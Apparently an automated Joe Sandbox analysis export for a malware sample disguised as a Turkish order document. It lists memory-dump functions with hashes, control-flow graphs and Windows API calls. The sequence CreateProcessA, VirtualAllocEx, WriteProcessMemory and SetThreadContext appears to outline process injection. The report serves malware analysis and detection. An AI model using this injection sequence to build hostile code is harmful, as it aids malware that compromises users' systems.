                                            • Instruction Fuzzy Hash: FB2128B1E006188BEB18CF9AD9547DEFBF3AFC9310F14C56AD408AA254DB340A59CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d25749262eb1267ee43356e5573bff040838d1e993b67027b35267c21b13534
                                            • Instruction ID: ef1628ce7ac210fe9d6a024223b287879d73acc2baaf0e3d90ad5e1e57198da4
                                            • Opcode Fuzzy Hash: 8d25749262eb1267ee43356e5573bff040838d1e993b67027b35267c21b13534
                                            • Instruction Fuzzy Hash: 2421C9B1D046188BEB58DFABC84069EFBF6BFC8300F14C06AC418A7264EB7009468F50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 72bebc8a2c5fc15f3044c422446ae592f6d4f8e0878a1ed92929be7b35ca5255
                                            • Instruction ID: c12d0f1debbeace51f212156454b96e2b977cae8795dbad47cd3d92ad0338f25
                                            • Opcode Fuzzy Hash: 72bebc8a2c5fc15f3044c422446ae592f6d4f8e0878a1ed92929be7b35ca5255
                                            • Instruction Fuzzy Hash: B121EDB1E047589FEB58DF678C506AEBBB7AFC9300F04C0BAC518AA264EB3405468F51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b30170e4e6eb7b2dd8a6016cdbeeec039baa6e872679798987801a11110e4cc
                                            • Instruction ID: fb31f9e19ce6d695b9db26157f2d6ccf20ba6dbd1f8fee25a8f3f0d7bae1d81d
                                            • Opcode Fuzzy Hash: 4b30170e4e6eb7b2dd8a6016cdbeeec039baa6e872679798987801a11110e4cc
                                            • Instruction Fuzzy Hash: 51218BB1E046189BEB58DF6BC85479EFAF7AFC9300F04C0B9D519AA264DB3405468F51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1447481114.0000000012900000.00000040.00000800.00020000.00000000.sdmp, Offset: 12900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_12900000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 359aa683ac1aa8a427644aaaaa43cf25e59c7b93cff64de5f5f5be6fd165b232
                                            • Instruction ID: 9af9329a1fc8525ab4cae67d4c8721902fcaf3f4aad7514abec707e990e9c77b
                                            • Opcode Fuzzy Hash: 359aa683ac1aa8a427644aaaaa43cf25e59c7b93cff64de5f5f5be6fd165b232
                                            • Instruction Fuzzy Hash: A3E01A36D4D158CBCB109F98E8545E9B77CEB4B220F0421AA9508A3211D7304A98CA05

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 9f8dd70-9f8de11 3 9f8de5a-9f8de82 0->3 4 9f8de13-9f8de2a 0->4 8 9f8dec8-9f8df1e 3->8 9 9f8de84-9f8de98 3->9 4->3 7 9f8de2c-9f8de31 4->7 10 9f8de33-9f8de3d 7->10 11 9f8de54-9f8de57 7->11 17 9f8df20-9f8df34 8->17 18 9f8df64-9f8e052 CreateProcessA 8->18 9->8 19 9f8de9a-9f8de9f 9->19 12 9f8de3f 10->12 13 9f8de41-9f8de50 10->13 11->3 12->13 13->13 16 9f8de52 13->16 16->11 17->18 27 9f8df36-9f8df3b 17->27 37 9f8e05b-9f8e140 18->37 38 9f8e054-9f8e05a 18->38 20 9f8dea1-9f8deab 19->20 21 9f8dec2-9f8dec5 19->21 24 9f8dead 20->24 25 9f8deaf-9f8debe 20->25 21->8 24->25 25->25 26 9f8dec0 25->26 26->21 29 9f8df3d-9f8df47 27->29 30 9f8df5e-9f8df61 27->30 31 9f8df49 29->31 32 9f8df4b-9f8df5a 29->32 30->18 31->32 32->32 34 9f8df5c 32->34 34->30 50 9f8e150-9f8e154 37->50 51 9f8e142-9f8e146 37->51 38->37 53 9f8e164-9f8e168 50->53 54 9f8e156-9f8e15a 50->54 51->50 52 9f8e148 51->52 52->50 56 9f8e178-9f8e17c 53->56 57 9f8e16a-9f8e16e 53->57 54->53 55 9f8e15c 54->55 55->53 59 9f8e17e-9f8e1a7 56->59 60 9f8e1b2-9f8e1bd 56->60 57->56 58 9f8e170 57->58 58->56 59->60 64 9f8e1be 60->64 64->64
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F8E03F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID: qMOW$qMOW
                                            • API String ID: 963392458-233828072
                                            • Opcode ID: 390b48ca89884acb7bded93c9f8d059f73d06c94eca2df5ddfe8a74f66b6d997
                                            • Instruction ID: eb9ff562fc8ab34a930aac8a186d15c6ee7bcc9b6fdba4ef9b0c2df9e48cbd68
                                            • Opcode Fuzzy Hash: 390b48ca89884acb7bded93c9f8d059f73d06c94eca2df5ddfe8a74f66b6d997
                                            • Instruction Fuzzy Hash: 0BC11871D0022D8FDB64EFA4C841BEEBBB1BF49300F0095A9E459B7290DB749A85CF95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 65 9f8dd78-9f8de11 67 9f8de5a-9f8de82 65->67 68 9f8de13-9f8de2a 65->68 72 9f8dec8-9f8df1e 67->72 73 9f8de84-9f8de98 67->73 68->67 71 9f8de2c-9f8de31 68->71 74 9f8de33-9f8de3d 71->74 75 9f8de54-9f8de57 71->75 81 9f8df20-9f8df34 72->81 82 9f8df64-9f8e052 CreateProcessA 72->82 73->72 83 9f8de9a-9f8de9f 73->83 76 9f8de3f 74->76 77 9f8de41-9f8de50 74->77 75->67 76->77 77->77 80 9f8de52 77->80 80->75 81->82 91 9f8df36-9f8df3b 81->91 101 9f8e05b-9f8e140 82->101 102 9f8e054-9f8e05a 82->102 84 9f8dea1-9f8deab 83->84 85 9f8dec2-9f8dec5 83->85 88 9f8dead 84->88 89 9f8deaf-9f8debe 84->89 85->72 88->89 89->89 90 9f8dec0 89->90 90->85 93 9f8df3d-9f8df47 91->93 94 9f8df5e-9f8df61 91->94 95 9f8df49 93->95 96 9f8df4b-9f8df5a 93->96 94->82 95->96 96->96 98 9f8df5c 96->98 98->94 114 9f8e150-9f8e154 101->114 115 9f8e142-9f8e146 101->115 102->101 117 9f8e164-9f8e168 114->117 118 9f8e156-9f8e15a 114->118 115->114 116 9f8e148 115->116 116->114 120 9f8e178-9f8e17c 117->120 121 9f8e16a-9f8e16e 117->121 118->117 119 9f8e15c 118->119 119->117 123 9f8e17e-9f8e1a7 120->123 124 9f8e1b2-9f8e1bd 120->124 121->120 122 9f8e170 121->122 122->120 123->124 128 9f8e1be 124->128 128->128
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F8E03F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID: qMOW$qMOW
                                            • API String ID: 963392458-233828072
                                            • Opcode ID: 837cfa499c67c04fca953094f31b9bd671704b2c071504035249baff7b691ec8
                                            • Instruction ID: 3c49cdfe69a81198ba2200c776563bff102556e7c04ca5f6699e2d31fca3dc22
                                            • Opcode Fuzzy Hash: 837cfa499c67c04fca953094f31b9bd671704b2c071504035249baff7b691ec8
                                            • Instruction Fuzzy Hash: E9C10871D0022D8FDB64EFA4C841BEEBBB1BF49310F0095A9E419B7290DB749A85CF95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 129 3148027-3148031 130 3148047-3148049 129->130 131 3148033-3148035 129->131 133 314804b-3148055 130->133 134 314805f-3148065 130->134 132 3148037-3148041 131->132 131->133 135 3148057-314805c 132->135 136 3148043 132->136 133->135 137 314806b-3148071 133->137 138 3148067 134->138 139 314807b-3148095 134->139 135->134 140 3148073-314807a 135->140 136->130 137->140 138->137 141 3148097-314809d 139->141 142 31480ab-31480b0 139->142 140->139 143 31480b3-31480b4 141->143 144 314809f-31480a9 141->144 145 31480b2 142->145 146 314812c-3148130 142->146 147 3148134-314813a 143->147 148 31480b6-31480b9 143->148 144->142 149 31480bf-31480c9 144->149 145->143 146->147 154 314813b-3148145 147->154 150 31480cf-31480d1 148->150 151 31480bb-31480bd 148->151 152 31480df-31480e5 149->152 153 31480cb 149->153 155 31480e7-31480ec 150->155 156 31480d3-31480d9 150->156 151->149 152->155 157 31480fb-3148100 152->157 153->150 158 3148147-3148155 154->158 159 314815b-314815d 154->159 160 31480ef-31480f1 155->160 156->160 161 31480db-31480de 156->161 166 3148177-314817a 157->166 167 3148102-3148106 157->167 162 3148157-3148159 158->162 163 314816b-3148172 158->163 164 3148173-3148175 159->164 165 314815f-3148161 159->165 169 3148107-314810c 160->169 170 31480f3-31480fa 160->170 161->152 162->159 163->164 164->166 165->166 171 3148163-3148165 165->171 168 314817b-314817c 166->168 167->169 172 314817d-3148184 168->172 169->172 174 314810e-3148115 169->174 170->157 171->168 173 3148167 171->173 177 3148186-314818c 172->177 178 31481f0-31481f1 172->178 173->163 175 3148117-314811c 174->175 176 314812b 174->176 179 3148194-3148195 175->179 180 314811e-3148125 175->180 176->146 181 31481ed 177->181 182 314818e-3148191 177->182 183 3148207-3148209 178->183 184 31481f3-31481f5 178->184 190 3148197-31481a5 179->190 191 31481ab-31481ad 179->191 180->154 199 3148127 180->199 185 31481ef 181->185 186 31481a7 182->186 187 3148193 182->187 189 314820b-3148219 183->189 192 314821f-314822c 183->192 188 31481f7-3148205 184->188 184->189 185->178 186->191 187->179 188->183 194 314821b 188->194 189->194 196 314822f-3148239 189->196 190->186 195 31481bb-31481c1 190->195 197 31481c3-31481c5 191->197 198 31481af-31481b8 191->198 192->196 194->192 195->197 200 31481d7-31481d9 195->200 201 314824f-3148254 196->201 202 314823b-3148241 196->202 203 31481c7-31481d1 197->203 204 31481db-31481e4 197->204 198->195 199->176 200->185 200->204 205 3148257-314825d 201->205 202->205 207 3148243-314824c 202->207 206 31481e7 203->206 208 31481d3 203->208 204->206 209 3148273-3148275 205->209 210 314825f-3148265 205->210 206->181 207->201 208->200 213 3148276-3148279 209->213 214 314828b-314828d 209->214 211 3148267-3148270 210->211 212 314827b-3148281 210->212 215 31482d5-314838f VirtualProtect 211->215 216 3148272 211->216 219 3148297-314829d 212->219 220 3148283-314828a 212->220 217 314828f-3148295 213->217 218 314827a 213->218 221 31482a3-31482a9 214->221 222 314828e 214->222 226 3148391-3148397 215->226 227 3148398-31483d4 215->227 216->209 217->219 218->212 219->221 220->214 224 31482bf-31482d2 221->224 225 31482ab-31482be 221->225 222->217 224->215 225->224 226->227
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: qMOW
                                            • API String ID: 0-141267435
                                            • Opcode ID: 751924646dccc47b5d3a60a4ead82284efba9401fe52e6c7ea3afd9a3c3d3b09
                                            • Instruction ID: 192242c937dd21d6ebb735dc55eaa7f987b833c7fbe62337488472d45c65cef4
                                            • Opcode Fuzzy Hash: 751924646dccc47b5d3a60a4ead82284efba9401fe52e6c7ea3afd9a3c3d3b09
                                            • Instruction Fuzzy Hash: 0CE171B7D012059FCB14CFA8D9C1AD9FBB1BF6E324B1E4156C8546F206E332A652CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 232 9f75e21-9f75e82 233 9f75e96-9f75ecc 232->233 234 9f75e84-9f75e93 232->234 235 9f75ed2-9f75f33 DrawTextExW 233->235 236 9f75ece 233->236 234->233 237 9f75f35-9f75f3b 235->237 238 9f75f3c-9f75f7e 235->238 236->235 237->238
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09F75F23
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID: qMOW
                                            • API String ID: 2175133113-141267435
                                            • Opcode ID: 365dc2b5f020acca6f9f133cf1b93dde9d3eae7fc174e08e18f7805ccdc8128e
                                            • Instruction ID: dbef095f71c162521cd445085aed3837e23032cafdbf60851aea362b9513c079
                                            • Opcode Fuzzy Hash: 365dc2b5f020acca6f9f133cf1b93dde9d3eae7fc174e08e18f7805ccdc8128e
                                            • Instruction Fuzzy Hash: 545155B8D002589FDB10CFA9D984ADEFBF1BB09310F24902AE818BB361D335A945CF54

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 262 9f75e28-9f75e82 263 9f75e96-9f75ecc 262->263 264 9f75e84-9f75e93 262->264 265 9f75ed2-9f75f33 DrawTextExW 263->265 266 9f75ece 263->266 264->263 267 9f75f35-9f75f3b 265->267 268 9f75f3c-9f75f7e 265->268 266->265 267->268
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09F75F23
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID: qMOW
                                            • API String ID: 2175133113-141267435
                                            • Opcode ID: b061eaba048d7ee3aa99b7bba1be5a8b31b30c927db247470201ff1a095ca659
                                            • Instruction ID: 1049dd393a79a4a57c8136b2302d5509557d2e2bbce12d243ca26a6d09be6eb0
                                            • Opcode Fuzzy Hash: b061eaba048d7ee3aa99b7bba1be5a8b31b30c927db247470201ff1a095ca659
                                            • Instruction Fuzzy Hash: 755144B9D012589FDB10CFAAD984ADEFBF5BB09310F24902AE818BB311D335A945CF54

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 242 314e564-314fedc CreateActCtxA 247 314fee5-314ff6a 242->247 248 314fede-314fee4 242->248 257 314ff97-314ff9f 247->257 258 314ff6c-314ff8f 247->258 248->247 258->257
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 0314FEC9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID: qMOW
                                            • API String ID: 2289755597-141267435
                                            • Opcode ID: e0cfeadd0fee7f122c2f19f2eb42c276b19a76b392df8a5c7e4725db82d4bd9c
                                            • Instruction ID: 0d7e5b8d94ac2e7d12734db113e634bde3836e1084eb41bd8ac3f9d439d74866
                                            • Opcode Fuzzy Hash: e0cfeadd0fee7f122c2f19f2eb42c276b19a76b392df8a5c7e4725db82d4bd9c
                                            • Instruction Fuzzy Hash: 2D51E2B1D00719DFDB20DFA5C844B9EBBF5AF49700F1080AAD509BB251DB716A89CF91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 272 9f8d9e8-9f8da5b 275 9f8da5d-9f8da6f 272->275 276 9f8da72-9f8dad3 WriteProcessMemory 272->276 275->276 278 9f8dadc-9f8db2e 276->278 279 9f8dad5-9f8dadb 276->279 279->278
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F8DAC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID: qMOW
                                            • API String ID: 3559483778-141267435
                                            • Opcode ID: 946a97ce862f2aeff1886be416dadb66a8f418ae8b7dfd094c5026a6f3da2ebc
                                            • Instruction ID: a3da629242686d4ef6205ee7e1284d322633996f2f2abb44f42c16e30a4831a6
                                            • Opcode Fuzzy Hash: 946a97ce862f2aeff1886be416dadb66a8f418ae8b7dfd094c5026a6f3da2ebc
                                            • Instruction Fuzzy Hash: DE41A9B4D012589FCF00DFA9D980ADEBBF5BF49310F24942AE818B7250D775AA45CF64

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 284 9f8d9f0-9f8da5b 286 9f8da5d-9f8da6f 284->286 287 9f8da72-9f8dad3 WriteProcessMemory 284->287 286->287 289 9f8dadc-9f8db2e 287->289 290 9f8dad5-9f8dadb 287->290 290->289
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F8DAC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID: qMOW
                                            • API String ID: 3559483778-141267435
                                            • Opcode ID: a2657dafcae03c339a1cdb796548f2e2437b5ab42c9ab2ff120d0d2b64c5500a
                                            • Instruction ID: ebaccab9c13372479e54270b16d72fefaf180af1d4075e6658e71146ce56bcc8
                                            • Opcode Fuzzy Hash: a2657dafcae03c339a1cdb796548f2e2437b5ab42c9ab2ff120d0d2b64c5500a
                                            • Instruction Fuzzy Hash: E341A8B4D012589FCF00DFA9D980AEEBBF5BB49310F24942AE818B7250D735AA45CB64

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 295 9f8db40-9f8dc0a ReadProcessMemory 298 9f8dc0c-9f8dc12 295->298 299 9f8dc13-9f8dc65 295->299 298->299
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F8DBFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID: qMOW
                                            • API String ID: 1726664587-141267435
                                            • Opcode ID: b9c5bfef8df6a46b5c38bd9eb61495b48c59ed6043dcfdfa6c2f7db11a44a318
                                            • Instruction ID: 83ab7639cd0402f89727d0f50fbce441d2578ddef98826659490335fbaff44ba
                                            • Opcode Fuzzy Hash: b9c5bfef8df6a46b5c38bd9eb61495b48c59ed6043dcfdfa6c2f7db11a44a318
                                            • Instruction Fuzzy Hash: 3341B9B9D002589FCF10CFA9D884AEEFBB5BF49310F14A42AE815B7250C775A945CF64

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 304 9f8db48-9f8dc0a ReadProcessMemory 307 9f8dc0c-9f8dc12 304->307 308 9f8dc13-9f8dc65 304->308 307->308
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F8DBFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID: qMOW
                                            • API String ID: 1726664587-141267435
                                            • Opcode ID: 4b9acb193e1a9c34f798c074f29f763fcc49bda036342114ae5ca30d0302854c
                                            • Instruction ID: 6bd370c782b83a9aa92e01d9120d25cd2a3221cd2da2888092167839ff607133
                                            • Opcode Fuzzy Hash: 4b9acb193e1a9c34f798c074f29f763fcc49bda036342114ae5ca30d0302854c
                                            • Instruction Fuzzy Hash: 7041B8B9D002589FCF10DFAAD884AEEFBB5BF49310F14942AE814B7250C775A945CF68

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 313 9f8d8c8-9f8d98a VirtualAllocEx 317 9f8d98c-9f8d992 313->317 318 9f8d993-9f8d9dd 313->318 317->318
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F8D97A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: qMOW
                                            • API String ID: 4275171209-141267435
                                            • Opcode ID: 1cf511738d8221a816a8953365c1ccc95a2d7e82a5f20cf20af2fd5ab7088811
                                            • Instruction ID: 74c8004b24a06df6781e597aaf9e803d25e5b1ed32b5786c9323779d35681136
                                            • Opcode Fuzzy Hash: 1cf511738d8221a816a8953365c1ccc95a2d7e82a5f20cf20af2fd5ab7088811
                                            • Instruction Fuzzy Hash: 4B3198B8D042589FCF10DFA9D880A9EFBB5BF49310F10942AE818B7250D735A901CF54

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 336 9f8d8d0-9f8d98a VirtualAllocEx 339 9f8d98c-9f8d992 336->339 340 9f8d993-9f8d9dd 336->340 339->340
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F8D97A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: qMOW
                                            • API String ID: 4275171209-141267435
                                            • Opcode ID: 7c1515b67b008c37deada2cc0d3f0579661c93503aaf750c8f1d872778e6cf15
                                            • Instruction ID: 4ccec52a6fdcccf0928130c9c8ff0c9900cd9d8f2487b32e8a43fd3165ba46df
                                            • Opcode Fuzzy Hash: 7c1515b67b008c37deada2cc0d3f0579661c93503aaf750c8f1d872778e6cf15
                                            • Instruction Fuzzy Hash: BE3187B9D002589FCF10DFA9D880AAEFBB5BF49310F10A42AE815B7350D735A905CF54

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 345 9f8d368-9f8d3d0 347 9f8d3d2-9f8d3e4 345->347 348 9f8d3e7-9f8d42f Wow64SetThreadContext 345->348 347->348 350 9f8d438-9f8d484 348->350 351 9f8d431-9f8d437 348->351 351->350
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 09F8D41F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID: qMOW
                                            • API String ID: 983334009-141267435
                                            • Opcode ID: de50ed3a55779d517a765ff8f3923321e7435696985da4486ab906b9d258086d
                                            • Instruction ID: 4fdef5a9e3aad3a810fd3b797460da6621a8800d61b64511089ef487d754488a
                                            • Opcode Fuzzy Hash: de50ed3a55779d517a765ff8f3923321e7435696985da4486ab906b9d258086d
                                            • Instruction Fuzzy Hash: 9F41CAB4D012589FDB14DFA9D885AEEFBF1BF48310F24802AE819B7290C738A945CF54
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 09F8D41F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID: qMOW
                                            • API String ID: 983334009-141267435
                                            • Opcode ID: bae8674e3a31d47e6abbad40b23a409ab5ef44a95ef97be2902c5ee66307c6d8
                                            • Instruction ID: b35e4574bda27e6bfb99935fb426bf050b52731d09cc03dc866466850754f7af
                                            • Opcode Fuzzy Hash: bae8674e3a31d47e6abbad40b23a409ab5ef44a95ef97be2902c5ee66307c6d8
                                            • Instruction Fuzzy Hash: B231CCB4D012589FDB14DFAAD884AEEFBF1BF48310F24802AE415B7280C738A945CF54
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0314837F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: qMOW
                                            • API String ID: 544645111-141267435
                                            • Opcode ID: 167b058222b4b17e2245519621740c7849f00a1aa5c019e4a9e1e4f6f29665d3
                                            • Instruction ID: d96a8ba3a461fd442c4c96abfeaed7377af045e5986031ac45a984747d9b36aa
                                            • Opcode Fuzzy Hash: 167b058222b4b17e2245519621740c7849f00a1aa5c019e4a9e1e4f6f29665d3
                                            • Instruction Fuzzy Hash: 1E3197B9D002589FCB10CFAAD880ADEFBF1BB49310F24902AE818B7310D775A945CF64
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 129013AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1447481114.0000000012900000.00000040.00000800.00020000.00000000.sdmp, Offset: 12900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_12900000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID: qMOW
                                            • API String ID: 410705778-141267435
                                            • Opcode ID: d63dc7e0f44cb87b84c1edcfae4e67cd79309dd026f5973097411621bd7061a5
                                            • Instruction ID: cbe320f6fdd8ffef3109e65af062aab31b9ee328eb5461c420a2acf447c6d8e6
                                            • Opcode Fuzzy Hash: d63dc7e0f44cb87b84c1edcfae4e67cd79309dd026f5973097411621bd7061a5
                                            • Instruction Fuzzy Hash: 653158B9D012589FCB14CFA9D580ADEFBF5BB49310F14901AE815B7320D375A945CF54
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 129013AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1447481114.0000000012900000.00000040.00000800.00020000.00000000.sdmp, Offset: 12900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_12900000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
